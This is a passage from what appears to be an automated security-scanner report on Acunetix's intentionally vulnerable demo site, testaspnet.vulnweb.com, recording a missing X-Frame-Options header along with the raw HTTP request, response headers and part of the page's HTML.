<p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 30606
Response Body - size: 30,606 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 